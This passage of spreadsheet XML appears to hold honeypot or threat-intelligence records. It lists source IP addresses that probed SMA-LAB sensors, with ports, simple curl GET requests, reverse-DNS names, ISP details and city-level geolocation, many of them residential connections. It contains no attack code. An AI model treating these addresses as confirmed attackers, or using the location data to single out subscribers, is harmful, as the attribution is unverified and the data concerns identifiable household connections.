    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;43785&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:5a26</t>
  </si>
  <si>
    <t>14377a1119f9b7d6b91c77d8f0e3a110</t>
  </si>
  <si>
    <t>49.213.157.79</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1363&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:31d5:9d4f</t>
  </si>
  <si>
    <t>d0df3cd9a732cc3854c44a3b2e476f6e</t>
  </si>
  <si>
    <t>86.220.108.235</t>
  </si>
  <si>
    <t>NA&amp;&amp;lfbn-ann-1-12-235.w86-220.abo.wanadoo.fr</t>
  </si>
  <si>
    <t>Rhône</t>
  </si>
  <si>
    <t>Lyon</t>
  </si>
  <si>
    <t>2996944</t>
  </si>
  <si>
    <t>69000</t>
  </si>
  <si>
    <t>45.764</t>
  </si>
  <si>
    <t>4.83566</t>
  </si>
  <si>
    <t>2005-03-02</t>
  </si>
  <si>
    <t>::ffff:56dc:6ceb</t>
  </si>
  <si>
    <t>0ac31ff50df561c452d972fb9bd13232</t>
  </si>
  <si>
    <t>46.118.84.45</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;1080&amp;&amp;389&amp;&amp;5900&amp;&amp;22&amp;&amp;23370</t>
  </si>
  <si>
    <t>::ffff:2e76:542d</t>
  </si>
  <si>
    <t>07f399f9060b57a758dc9f0ebb7f1e9b</t>
  </si>
  <si>
    <t>1.175.109.10</t>
  </si>
  <si>
    <t>1-175-109-10.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:1af:6d0a</t>
  </si>
  <si>
    <t>d89344d1d28da3b4abd3ba9e7363b339</t>
  </si>
  <si>
    <t>126.11.105.219</t>
  </si>
  <si>
    <t>35.6552</t>
  </si>
  <si>
    <t>SOFTBANK Corp</t>
  </si>
  <si>
    <t>2005-02-08</t>
  </si>
  <si>
    <t>::ffff:7e0b:69db</t>
  </si>
  <si>
    <t>79c616f679e08b15d67681fcd45849aa</t>
  </si>
  <si>
    <t>27.6.222.172</t>
  </si>
  <si>
    <t>::ffff:1b06:deac</t>
  </si>
  <si>
    <t>afc1eb51514a127194ed73cdcb43c7d4</t>
  </si>
  <si>
    <t>43.224.49.69</t>
  </si>
  <si>
    <t>KKT</t>
  </si>
  <si>
    <t>Kwun Tong</t>
  </si>
  <si>
    <t>Kowloon Bay</t>
  </si>
  <si>
    <t>8504415</t>
  </si>
  <si>
    <t>22.324</t>
  </si>
  <si>
    <t>114.204</t>
  </si>
  <si>
    <t>9381</t>
  </si>
  <si>
    <t>HKBN Enterprise Solutions HK Limited</t>
  </si>
  <si>
    <t>2014-11-20</t>
  </si>
  <si>
    <t>HKBNES-HK</t>
  </si>
  <si>
    <t>::ffff:2be0:3145</t>
  </si>
  <si>
    <t>345bbe570c07cb6beb7bb79df9569e71</t>
  </si>
  <si>
    <t>59.182.130.71</t>
  </si>
  <si>
    <t>::ffff:3bb6:8247</t>
  </si>
  <si>
    <t>e1af5946acadbd4d0ca0a48cee3065da</t>
  </si>
  <si>
    <t>117.255.103.41</t>
  </si>
  <si>
    <t>::ffff:75ff:6729</t>
  </si>
  <si>
    <t>5139c1daf1c808ba4f107f263558413c</t>
  </si>
  <si>
    <t>117.199.151.27</t>
  </si>
  <si>
    <t>::ffff:75c7:971b</t>
  </si>
  <si>
    <t>e3da59298629f51a8603d617a11f2939</t>
  </si>
  <si>
    <t>117.205.161.15</t>
  </si>
  <si>
    <t>Jhargram</t>
  </si>
  <si>
    <t>Jhārgrām</t>
  </si>
  <si>
    <t>1268990</t>
  </si>
  <si>
    <t>721514</t>
  </si>
  <si>
    <t>22.455</t>
  </si>
  <si>
    <t>86.9974</t>
  </si>
  <si>
    <t>::ffff:75cd:a10f</t>
  </si>
  <si>
    <t>a012727e26f9232d5e6f59fcba81dd38</t>
  </si>
  <si>
    <t>82.64.54.204</t>
  </si>
  <si>
    <t>NA&amp;&amp;82-64-54-204.subs.proxad.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>15476&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>ProXad network / Free SA</t>
  </si>
  <si>
    <t>::ffff:5240:36cc</t>
  </si>
  <si>
    <t>336dee2f4b190c89a766c36e89b990d2</t>
  </si>
  <si>
    <t>104.167.223.55</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H33</t>
  </si>
  <si>
    <t>25&amp;&amp;51114&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:68a7:df37</t>
  </si>
  <si>
    <t>0f1452e0bec7a8d61cf6e3c706caf10b</t>
  </si>
  <si>
    <t>104.35.120.102</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-104-035-120-102.res.spectrum.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>Los Angeles (Canoga Park)</t>
  </si>
  <si>
    <t>5368381</t>
  </si>
  <si>
    <t>91303</t>
  </si>
  <si>
    <t>34.1989</t>
  </si>
  <si>
    <t>-118.597</t>
  </si>
  <si>
    <t>::ffff:6823:7866</t>
  </si>
  <si>
    <t>9fffb4e230eea466c35320c1b1b2507c</t>
  </si>
  <si>
    <t>37.229.30.229</t>
  </si>
  <si>
    <t>::ffff:25e5:1ee5</t>
  </si>
  <si>
    <t>b8c59e7bd006bf5f2286d99b4bc8d234</t>
  </si>
  <si>
    <t>117.235.224.165</t>
  </si>
  <si>
    <t>::ffff:75eb:e0a5</t>
  </si>
  <si>
    <t>ef3e8a22e67e7d8c4985119f4a8ff065</t>
  </si>
  <si>
    <t>185.89.75.157</t>
  </si>
  <si>
    <t>IE</t>
  </si>
  <si>
    <t>Ireland</t>
  </si>
  <si>
    <t>County Wexford</t>
  </si>
  <si>
    <t>Gorey (Gorey corporation lands)</t>
  </si>
  <si>
    <t>2963962</t>
  </si>
  <si>
    <t>Y25</t>
  </si>
  <si>
    <t>52.6771</t>
  </si>
  <si>
    <t>-6.29281</t>
  </si>
  <si>
    <t>201000</t>
  </si>
  <si>
    <t>WHIZZY-FTTX</t>
  </si>
  <si>
    <t>Whizzy Internet</t>
  </si>
  <si>
    <t>::ffff:b959:4b9d</t>
  </si>
  <si>
    <t>719901d69cc10a39700b6ec5651b02c1</t>
  </si>
  <si>
    <t>109.227.159.21</t>
  </si>
  <si>
    <t>Chamartin</t>
  </si>
  <si>
    <t>3125239</t>
  </si>
  <si>
    <t>40.4621</t>
  </si>
  <si>
    <t>-3.6766</t>
  </si>
  <si>
    <t>15704</t>
  </si>
  <si>
    <t>XTRA TELECOM S.A.</t>
  </si>
  <si>
    <t>Xtra Telecom S.A.</t>
  </si>
  <si>
    <t>XFERA Moviles S.A</t>
  </si>
  <si>
    <t>::ffff:6de3:9f15</t>
  </si>
  <si>
    <t>af64981c4e6574e3f9bd020e1d8ff89e</t>
  </si>
  <si>
    <t>117.245.218.17</t>
  </si>
  <si>
    <t>::ffff:75f5:da11</t>
  </si>
  <si>
    <t>6c61e8300c75366eb815aacd99e8c498</t>
  </si>
  <si>
    <t>117.255.27.246</t>
  </si>
  <si>
    <t>::ffff:75ff:1bf6</t>
  </si>
  <si>
    <t>915383553f8baf29d719510f7951d2d7</t>
  </si>
  <si>
    <t>220.133.142.174</t>
  </si>
  <si>
    <t>220-133-142-174.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;29858&amp;&amp;23&amp;&amp;NA&amp;&amp;47069&amp;&amp;25083&amp;&amp;47090&amp;&amp;47111&amp;&amp;47100&amp;&amp;47131&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc85:8eae</t>
  </si>
  <si>
    <t>7e0636d91b366faae4f6ca5e6e179f04</t>
  </si>
  <si>
    <t>59.182.140.5</t>
  </si>
  <si>
    <t>::ffff:3bb6:8c05</t>
  </si>
  <si>
    <t>2258412e74c32bf1a7f5e94612e4dda4</t>
  </si>
  <si>
    <t>62.42.130.66</t>
  </si>
  <si>
    <t>NA&amp;&amp;62.42.130.66.dyn.user.ono.com</t>
  </si>
  <si>
    <t>Palencia</t>
  </si>
  <si>
    <t>3114531</t>
  </si>
  <si>
    <t>34001</t>
  </si>
  <si>
    <t>42.0095</t>
  </si>
  <si>
    <t>-4.52406</t>
  </si>
  <si>
    <t>6739</t>
  </si>
  <si>
    <t>VODAFONE ONO, S.A.</t>
  </si>
  <si>
    <t>Ono</t>
  </si>
  <si>
    <t>ONO</t>
  </si>
  <si>
    <t>2000-05-03</t>
  </si>
  <si>
    <t>1995-08-02 04:00:00</t>
  </si>
  <si>
    <t>2025-12-14 19:48:41</t>
  </si>
  <si>
    <t>2024-11-04 16:14:55</t>
  </si>
  <si>
    <t>['DNS01.ONO.COM', 'DNS02.ONO.COM', 'DNS03.ONO.COM']</t>
  </si>
  <si>
    <t>Nominalia Internet SL</t>
  </si>
  <si>
    <t>abuse@nominalia.com</t>
  </si>
  <si>
    <t>::ffff:3e2a:8242</t>
  </si>
  <si>
    <t>6952228bfc7b73bbce6817f9bd8b019e</t>
  </si>
  <si>
    <t>182.57.182.231</t>
  </si>
  <si>
    <t>::ffff:b639:b6e7</t>
  </si>
  <si>
    <t>69c5dcfe586ce6dd429cb3e111aaabf6</t>
  </si>
  <si>
    <t>73.88.104.76</t>
  </si>
  <si>
    <t>c-73-88-104-76.hsd1.sc.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>23&amp;&amp;37492</t>
  </si>
  <si>
    <t>Berkeley</t>
  </si>
  <si>
    <t>Hanahan</t>
  </si>
  <si>
    <t>4581023</t>
  </si>
  <si>
    <t>29410</t>
  </si>
  <si>
    <t>32.8829</t>
  </si>
  <si>
    <t>-80.0953</t>
  </si>
  <si>
    <t>2005-04-19</t>
  </si>
  <si>
    <t>::ffff:4958:684c</t>
  </si>
  <si>
    <t>d0a55cccada4d63915950123808d8e42</t>
  </si>
  <si>
    <t>74.215.227.186</t>
  </si>
  <si>
    <t>lo-esr1-74-215-227-186.fuse.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>6181</t>
  </si>
  <si>
    <t>Cincinnati Bell Telephone Company LLC</t>
  </si>
  <si>
    <t>Fuse Internet Access</t>
  </si>
  <si>
    <t>Fuse Internet Access - BRAS W 7th Region</t>
  </si>
  <si>
    <t>1995-12-12 05:00:00</t>
  </si>
  <si>
    <t>2025-12-11 05:00:00</t>
  </si>
  <si>
    <t>2024-10-14 06:37:53</t>
  </si>
  <si>
    <t>['NS1.FUSE.NET', 'NS2.FUSE.NET']</t>
  </si>
  <si>
    <t>::ffff:4ad7:e3ba</t>
  </si>
  <si>
    <t>ff804b2adb157b54b8be81cbd74916ec</t>
  </si>
  <si>
    <t>117.205.158.166</t>
  </si>
  <si>
    <t>::ffff:75cd:9ea6</t>
  </si>
  <si>
    <t>2427f9c8e36706bf575259d1f09da7e9</t>
  </si>
  <si>
    <t>117.207.45.50</t>
  </si>
  <si>
    <t>::ffff:75cf:2d32</t>
  </si>
  <si>
    <t>76dfd4719b5ed3d80841230c30497e5e</t>
  </si>
  <si>
    <t>125.229.240.136</t>
  </si>
  <si>
    <t>125-229-240-136.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>::ffff:7de5:f088</t>
  </si>
  <si>
    <t>1ba4c42ea119fa2657a0d004632fbe20</t>
  </si>
  <si>
    <t>187.229.81.247</t>
  </si>
  <si>
    <t>TAB</t>
  </si>
  <si>
    <t>Tabasco</t>
  </si>
  <si>
    <t>Emiliano Zapata</t>
  </si>
  <si>
    <t>3527880</t>
  </si>
  <si>
    <t>17.7406</t>
  </si>
  <si>
    <t>-91.7663</t>
  </si>
  <si>
    <t>::ffff:bbe5:51f7</t>
  </si>
  <si>
    <t>42db9848cf7c36af073fefe8b53765ca</t>
  </si>
  <si>
    <t>117.214.77.102</t>
  </si>
  <si>
    <t>::ffff:75d6:4d66</t>
  </si>
  <si>
    <t>dcde636adc56500b8bf2ba7891f17eba</t>
  </si>
  <si>
    <t>209.103.254.46</t>
  </si>
  <si>
    <t>::ffff:d167:fe2e</t>
  </si>
  <si>
    <t>ee5e9e9af3a7cc8d4076f2fa7137994f</t>
  </si>
  <si>
    <t>59.184.151.25</t>
  </si>
  <si>
    <t>::ffff:3bb8:9719</t>
  </si>
  <si>
    <t>010275373e8b6ec5776b5de7d16aff50</t>
  </si>
  <si>
    <t>117.195.228.22</t>
  </si>
  <si>
    <t>::ffff:75c3:e416</t>
  </si>
  <si>
    <t>a420d4cda8a55dcdea0669b5373eb9cd</t>
  </si>
  <si>
    <t>69.250.159.104</t>
  </si>
  <si>
    <t>NA&amp;&amp;c-69-250-159-104.hsd1.va.comcast.net</t>
  </si>
  <si>
    <t>Prince William</t>
  </si>
  <si>
    <t>Dale City</t>
  </si>
  <si>
    <t>4755158</t>
  </si>
  <si>
    <t>38.6371</t>
  </si>
  <si>
    <t>-77.3111</t>
  </si>
  <si>
    <t>Comcast Cable Communications, Inc</t>
  </si>
  <si>
    <t>2004-02-11</t>
  </si>
  <si>
    <t>JUMPSTART-4</t>
  </si>
  <si>
    <t>::ffff:45fa:9f68</t>
  </si>
  <si>
    <t>287ad0e98e31ae7f78623cc859e46456</t>
  </si>
  <si>
    <t>153.166.43.153</t>
  </si>
  <si>
    <t>p12763153-ipxg45601marunouchi.tokyo.ocn.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Chiyoda (Marunouchi)</t>
  </si>
  <si>
    <t>100-0000</t>
  </si>
  <si>
    <t>35.6804</t>
  </si>
  <si>
    <t>139.766</t>
  </si>
  <si>
    <t>::ffff:99a6:2b99</t>
  </si>
  <si>
    <t>fefd2fc429ffe87da51ad78777bfb02d</t>
  </si>
  <si>
    <t>79.209.103.190</t>
  </si>
  <si>
    <t>NA&amp;&amp;p4fd167be.dip0.t-ipconnect.de</t>
  </si>
  <si>
    <t>2023-04-24 13:53:29</t>
  </si>
  <si>
    <t>['dns00.dns.t-ipnet.de', 'dns02.dns.t-ipnet.de', 'dns20.dns.t-ipnet.de', 'dns50.dns.t-ipnet.de', 'pns.dtag.de']</t>
  </si>
  <si>
    <t>connect</t>
  </si>
  <si>
    <t>::ffff:4fd1:67be</t>
  </si>
  <si>
    <t>d58e4936a4433604bb0b8a234253a1a9</t>
  </si>
  <si>
    <t>117.193.51.231</t>
  </si>
  <si>
    <t>::ffff:75c1:33e7</t>
  </si>
  <si>
    <t>8261369bf2680e5785974b38581c77fd</t>
  </si>
  <si>
    <t>116.73.220.12</t>
  </si>
  <si>
    <t>::ffff:7449:dc0c</t>
  </si>
  <si>
    <t>5070a133d374d26ffc1e132998ecc3bd</t>
  </si>
  <si>
    <t>122.116.244.47</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-116-244-47.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>::ffff:7a74:f42f</t>
  </si>
  <si>
    <t>f8dd65dc5f3cdbbbd44b69981ae685dc</t>
  </si>
  <si>
    <t>220.135.213.213</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-213-213.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>24.9937</t>
  </si>
  <si>
    <t>121.297</t>
  </si>
  <si>
    <t>::ffff:dc87:d5d5</t>
  </si>
  <si>
    <t>1cefd4335ef2c73477ef5bc0eb3e523e</t>
  </si>
  <si>
    <t>84.145.67.28</t>
  </si>
  <si>
    <t>::ffff:5491:431c</t>
  </si>
  <si>
    <t>99e20ae30aff89c0396e34e506358633</t>
  </si>
  <si>
    <t>59.182.143.169</t>
  </si>
  <si>
    <t>::ffff:3bb6:8fa9</t>
  </si>
  <si>
    <t>b475ec9356f908f6eeaf62d7b9913eaf</t>
  </si>
  <si>
    <t>59.98.26.74</t>
  </si>
  <si>
    <t>::ffff:3b62:1a4a</t>
  </si>
  <si>
    <t>86056c0b03d8e16e571c5a641436a873</t>
  </si>
  <si>
    <t>61.61.218.235</t>
  </si>
  <si>
    <t>24163</t>
  </si>
  <si>
    <t>Union Cable TV Co., ltd.</t>
  </si>
  <si>
    <t>ELANET-NET</t>
  </si>
  <si>
    <t>::ffff:3d3d:daeb</t>
  </si>
  <si>
    <t>62ba3842aa40a10f4e9952230aa28a98</t>
  </si>
  <si>
    <t>59.98.23.248</t>
  </si>
  <si>
    <t>::ffff:3b62:17f8</t>
  </si>
  <si>
    <t>f2f519f570d7cd1af9fafd2571db0146</t>
  </si>
  <si>
    <t>117.209.14.220</t>
  </si>
  <si>
    <t>::ffff:75d1:edc</t>
  </si>
  <si>
    <t>43e84cbb3618cb990e05fa43624ee95e</t>
  </si>
  <si>
    <t>117.248.3.168</t>
  </si>
  <si>
    <t>::ffff:75f8:3a8</t>
  </si>
  <si>
    <t>e2da23b34dc14f1d007b8818ba112bf2</t>
  </si>
  <si>
    <t>78.175.90.15</t>
  </si>
  <si>
    <t>78</t>
  </si>
  <si>
    <t>Karabük Province</t>
  </si>
  <si>
    <t>Karabük Merkez</t>
  </si>
  <si>
    <t>Karabük</t>
  </si>
  <si>
    <t>744562</t>
  </si>
  <si>
    <t>41.1956</t>
  </si>
  <si>
    <t>32.6227</t>
  </si>
  <si>
    <t>::ffff:4eaf:5a0f</t>
  </si>
  <si>
    <t>0427c6cb4c758f0a97988d075b633fbb</t>
  </si>
  <si>
    <t>46.185.84.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45965&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2eb9:5476</t>
  </si>
  <si>
    <t>7da5d938a19b0b11ee3c375042e6176f</t>
  </si>
  <si>
    <t>159.112.17.118</t>
  </si>
  <si>
    <t>NA&amp;&amp;h159-112-17-118.spkqwa.broadband.dynamic.tds.net</t>
  </si>
  <si>
    <t>Redmond</t>
  </si>
  <si>
    <t>5808079</t>
  </si>
  <si>
    <t>98073</t>
  </si>
  <si>
    <t>47.674</t>
  </si>
  <si>
    <t>-122.122</t>
  </si>
  <si>
    <t>4181</t>
  </si>
  <si>
    <t>TDS TELECOM</t>
  </si>
  <si>
    <t>2022-06-30</t>
  </si>
  <si>
    <t>TDST</t>
  </si>
  <si>
    <t>::ffff:9f70:1176</t>
  </si>
  <si>
    <t>b545230b6f883d300b2e4f4722d28cd2</t>
  </si>
  <si>
    <t>117.243.64.210</t>
  </si>
  <si>
    <t>::ffff:75f3:40d2</t>
  </si>
  <si>
    <t>a5f2b34edc1545e1deaf23d8f113b7fe</t>
  </si>
  <si>
    <t>220.134.6.144</t>
  </si>
  <si>
    <t>220-134-6-144.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
